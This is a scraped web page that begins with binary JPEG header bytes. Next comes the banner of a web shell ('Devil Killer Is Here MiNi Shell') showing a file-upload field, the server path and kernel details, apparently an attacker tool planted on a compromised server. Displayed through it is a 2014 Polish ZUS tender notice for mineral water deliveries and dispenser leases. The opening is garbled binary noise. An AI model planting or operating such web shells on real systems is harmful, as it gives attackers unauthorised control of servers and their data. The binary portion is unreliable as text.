JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140317/88524-N-2014.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa wody mineralnej i źródlanej oraz dzierżawa dystrybutorów dla Oddziałów ZUS w: Bielsku-Białej, Częstochowie, Chorzowie, Rybniku, Sosnowcu i Zabrzu oraz dla podległych  jednostek  organizacyjnych</b><br>
<b>Numer ogłoszenia: 88524 - 2014; data zamieszczenia: 17.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Bielsku -Białej , ul. Krasińskiego 34, 43-300 Bielsko-Biała, woj. śląskie, tel. 33 825 27 15, faks 33 825 27 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wody mineralnej i źródlanej oraz dzierżawa dystrybutorów dla Oddziałów ZUS w: Bielsku-Białej, Częstochowie, Chorzowie, Rybniku, Sosnowcu i Zabrzu oraz dla podległych  jednostek  organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 Dostawa wody mineralnej w butelkach PET 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dostawa jednorazowych kubków plastikowych o poj. 200 ml, dzierżawa dystrybutorów dla Oddziału ZUS w Bielsku-Białej wraz z podległymi jednostkami terenowymi.

Ilość i miejsce dostawy:

1)Oddział ZUS w Bielsku - Białej, ul. Krasińskiego 34:   
 woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowanej i gazowanej w butelkach PET o pojemności 1,5 l.   ok. 7.960 szt.,
 dostawa i zainstalowanie dystrybutorów - 4 szt.

2) Oddział ZUS w Bielsku-Białej, ul. Traugutta 2:
 dostawa i zainstalowanie dystrybutorów - 2 szt.

3) Inspektorat ZUS w Cieszynie, ul. Bielska 29: 
 dostawa i zainstalowanie dystrybutorów - 2 szt.

4) Inspektorat ZUS w Żywcu, ul. Piernikarska 2: 
 dostawa i zainstalowanie dystrybutorów - 2 szt.

Woda źródlana naturalna niegazowana (całkowita mineralizacja od 500mg/l) w butlach 18,9 l (+/- 0,2 l.) - 481 szt. oraz kubki plastikowe jednorazowe o poj. 200 ml - 227 op. ( po 100 sztuk w jednym opakowaniu) będą dostarczana do wszystkich ww. lokalizacji, w okresie letnim od czerwca do września, na podstawie złożonego zamówienia przez upoważnionego pracownika Zamawiającego.
Szczegółowy opis zamówienia stanowi załącznik nr 1 A do SIWZ.

Część nr 2 Dostawa wody źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów oraz dostawa jednorazowych kubków plastikowych o poj. 200 ml. dla Oddziału ZUS w Częstochowie wraz z podległymi jednostkami terenowymi.

Ilość i miejsce dostawy:

1)	Oddział ZUS w Częstochowie, ul. Dąbrowskiego 43/45:   

 dostawa kubków plastikowych jednorazowych o poj. 200 ml. - 120 op. ( 100 szt. w jednym opakowaniu),
 dostawa i zainstalowanie dystrybutorów - 14 szt.

2) Oddział ZUS w Częstochowie, ul. Okólna 17/19:
 dostawa i zainstalowanie dystrybutorów - 4 szt.

3) Inspektorat ZUS w Kłobucku, ul. Targowa 3 a: 
 dostawa i zainstalowanie dystrybutorów - 2 szt.

4) Inspektorat ZUS w Lublińcu, ul. Oleska 26: 
 dostawa i zainstalowanie dystrybutorów - 3 szt.

5) Inspektorat ZUS w Myszkowie, ul. Sikorskiego 57: 
 dostawa i zainstalowanie dystrybutorów - 3 szt.

6) Biuro Terenowe ZUS w Koniecpolu, ul. Rynek 1: 
dostawa i zainstalowanie dystrybutorów - 2 szt.

Woda źródlana naturalna niegazowana (całkowita mineralizacja od 500mg/l) w butlach 18,9 l. (+/- 0,2 l.) - 900 szt.
Szczegółowy opis zamówienia stanowi załącznik nr 1 B do SIWZ.

Część nr 3    Dostawa wody mineralnej, w butelkach PET 0,5 l., 1,5 l., w butelkach szklanych 0,33 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dla Oddziału ZUS w Chorzowie.

Ilość i miejsce dostawy:

1)Oddział ZUS w Chorzowie, ul. Gen. Henryka Dąbrowskiego 45 i ul. Lwowska 2:   

gazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 1,5 l., pakowana w zgrzewkach  po 6 szt. -12 000 butelek.
niegazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)    w butelkach plastikowych typu PET o pojemności 1,5 l., pakowana w zgrzewkach po  6 szt. - 8 000 butelek.
gazowana woda    mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 0,5 l., w zgrzewkach min. 12 szt. - 1 100 butelek.
niegazowana woda  mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 0,5 l, w zgrzewkach  min. 12 szt. - 710 butelka.
niegazowana woda źródlana (całkowita mineralizacja od 500mg/l)  do dystrybutorów w butlach o pojemności 18,9 l. (+/-0,2 l.) - 228 butli.
gazowana i niegazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)w szklanych butelkach zamykanych zakrętkami o pojemności 0,33 l, w zgrzewkach min. 4 szt.  - 330 butelek.

Szczegółowy opis zamówienia stanowi załącznik nr 1 C do SIWZ.


Część nr 4 Dostawa wody mineralnej w butelkach PET  0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów dla Oddziału ZUS w Rybniku.

Ilość i miejsce dostawy:

wody źródlanej niskozmineralizowanej o ogólnej sumie składników mineralnych  od 273 mg/l dla pracowników o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 800 szt. w okresie od 02.05.2014r. do 30.09.2014r.
wody źródlanej niskozmineralizowanej o ogólnej sumie składników mineralnych od 273 mg/l dla pracowników i na Salę Obsługi Klienta o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 280 szt. w okresie od 02.01.2015r. do 29.05.2015r
wody mineralnej dla pracowników wg poniższego asortymentu w okresie od 02.05.2014r. do 30.09.2014r:
woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 1,5 l. w ilości 762 szt.
woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 0,5 l. w ilości 348 szt.
woda mineralna gazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe  a 0,5 l. w ilości 600 szt.
wody mineralnej dla pracowników wg poniższego asortymentu w okresie od 04.05.2015r. do 29.05.2015r:
woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 1,5 l.  w ilości 162 szt.
woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 0,5 l. w ilości 72 szt.
woda mineralna gazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe  a 0,5 l. w ilości 120 szt.

dostawa i zainstalowanie dystrybutorów - 55 szt.( miejsca dostawy  zostaną uzgodnione z Zamawiającym po podpisaniu umowy) Wykonawca  zobowiązany jest do zainstalowania 23 szt. dystrybutorów w roku 2014  ( w okresie od 02.05.2014r. do 30.09.2014r.) oraz 32 szt. dystrybutorów w roku 2015  ( 9 szt. w okresie od 02.01.2015r. do 29.05.2015r i 23 szt. w okresie od 04.05.2015r. do 29.05.2015r) w miejscach użytkowych wskazanych przez Zamawiającego (Oddział ZUS w Rybniku i podległe Inspektoraty). 
Dystrybutory muszą umożliwiać praktyczne korzystanie z wody i w celu zapewnienia higieny i bezpieczeństwa użytkowania, posiadać możliwość zabezpieczenia przed rozlaniem wody na podłogę (odpowiednia rynienka lub kieszonka umieszczona pod kranikiem). Dystrybutory w ilości 9 szt., które zostaną zainstalowane w 2015 r. w okresie  od 02.01.2015r. do 29.05.2015 r. powinny posiadać podajniki do kubków.                                         


Szczegółowy opis zamówienia stanowi załącznik nr 1 D do SIWZ.

Część nr 5  Dostawa wody mineralnej w butelkach PET 0,5 l., 1,5 l.  dla Oddziału ZUS w Sosnowcu.

Ilość i miejsce dostawy:

1)Oddział ZUS w Sosnowcu, ul. Partyzantów 1:   

woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowana w butelkach PET o poj. 1,5 l., ilość: 7400
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) gazowana w butelkach PET o poj. 1,5 l., ilość: 7450
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowana w butelkach PET o poj. 0,5 l., ilość: 2500 szt.
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) gazowana w butelkach PET o poj. 0,5 l., ilość: 500 szt.

Szczegółowy opis zamówienia stanowi załącznik nr 1 E do SIWZ.

Część nr 6 Dostawa wody mineralnej w butelkach PET 0,33 l., 0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawy dystrybutorów dla Oddziału ZUS w Zabrzu wraz z podległymi jednostkami terenowymi.

Ilość i miejsce dostawy:

1)Oddział ZUS w Zabrzu, ul. Szczęść Boże 18:   

1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta, 
1 dystrybutor wody butlowej, ulokowany w Poczekalni przed Gabinetami Lekarskimi, 
wody mineralnej średniozmineralizowana o ogólnej sumie składników mineralnych od 500 mg/l  w butelkach PET 1,5 l. w ilości 6 729 sztuk (na podstawie przepisów BHP) dla potrzeb pracowników Zakładu   Ubezpieczeń Społecznych Oddział w Zabrzu - dostawy w okresie letnim, tj.: od 01.06.2014r. do 30.09.2014r., 
wody mineralnej średniozmineralizowana o ogólnej sumie składników mineralnych od 500 mg/l  w butelkach plastikowych o pojemności:  0,5 l. - woda mineralna gazowana w ilości 130 sztuk, 0,33 l. - woda mineralna niegazowana w ilości 130 sztuk,
naturalna woda źródlana niskozmineralizowana o ogólnej sumie składników mineralnych do 500 mg/l, o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 120 szt. ( dostawa do miejsc, w których będą dystrybutory)

2)Inspektorat ZUS w Tarnowskich Górach przy ul. Górniczej 4-8: 
1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,
3)Biuro Terenowe ZUS w Bytomiu przy ul. Sądowej 8: 
 1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,
4)Biuro Terenowe ZUS w Gliwicach przy ul. Pszczyńskiej 44A: 
1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,  

Szczegółowy opis zamówienia stanowi załącznik nr 1 F do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 39.22.21.20-1, 41.11.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamowień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamowień publicznych,
-wykaz wykonanych lub wykonywanych, głównych dostaw w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Za główne dostawy Zamawiający uzna min. 2 dostawy, (bez względu na ile części Wykonawca składa ofertę) polegające na dostawie wody mineralnej lub źródlanej, w tym co najmniej jedna dostawa o wartości nie niższej niż 20.000 zł.( w skali 12 miesięcy).Dowodami są:
 - poświadczenie, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedstawiania ww. dowodów;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamowień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamowień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-oświadczenie złożone na podstawie art. 44 ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamowień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-karta oferty Wykonawcy - wzór stanowi załącznik nr 1 do SIWZ;
oświadczenie o braku podstaw do wykluczenia - wzór oświadczenia stanowi załącznik nr 3 do SIWZ;
-zobowiązanie podmiotu trzeciego wzór stanowi załącznik nr 6 do SIWZ - jeżeli dotyczy;
-oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wzór stanowi załącznik nr 7 do SIWZ;
-oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wzór stanowi załącznik nr 8 do SIWZ;
-formularze cenowe - załącznik nr 9 do SIWZ;
w przypadku, gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  - pełnomocnictwo określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
-w przypadku gdy Wykonawcę reprezentuję pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza następujące zmiany w umowie:

a.zmiana terminu końcowego. Okolicznościami stanowiącymi podstawę zmiany terminu może być wystąpienie siły wyższej, której działanie uniemożliwiło terminową realizację przedmiotu zamówienia; działanie siły wyższej rozumiane jest jako wszelkie nadzwyczajne zdarzenia o charakterze zewnętrznym, niemożliwe do przewidzenia, takie jak katastrofy, pożary, powodzie, wybuchy, ataki terrorystyczne, niepokoje społeczne, działania wojenne, strajki, z wyjątkiem strajku u Wykonawcy,
b.zmiana umowy w zakresie przeniesienia praw i obowiązków wynikających z umowy na osoby trzecie w zakresie cesji wierzytelności, warunkiem jest uzyskanie pisemnej zgody Zamawiającego,
c.zmiana umowy wynikająca z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub korzystnej dla Zamawiającego,
d.zmiana komparycji umowy w przypadku podziału, łączenia lub przekształcenia Wykonawcy dokonanego na podstawie art. 494, art. 531 lub art. 553 Kodeksu Spółek Handlowych.

2.Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

3.Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności.

4.Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca jak i Zamawiający.

5.Nie stanowi zmiany:

a.zmiana adresu do korespondencji,
b.utrata mocy lub zmiana aktów prawnych przywołanych w treści umowy. Strony stosują się do obowiązujących w danym czasie aktów    prawnych,
c.zmiana osób reprezentujących Zamawiającego i Wykonawcę,
d.zmiana osób odpowiedzialnych za nadzór nad realizacją umowy,    
e.zmiana numeru rachunku bankowego na które Zamawiający będzie przekazywał płatności wynikające z realizacji umowy.

6.Zmiany, o których mowa w ust. 5, z wyjątkiem pkt b, dokonywane są w drodze jednostronnego pisemnego oświadczenia danej  strony  i   wywołują skutek od dnia doręczenia go drugiej stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
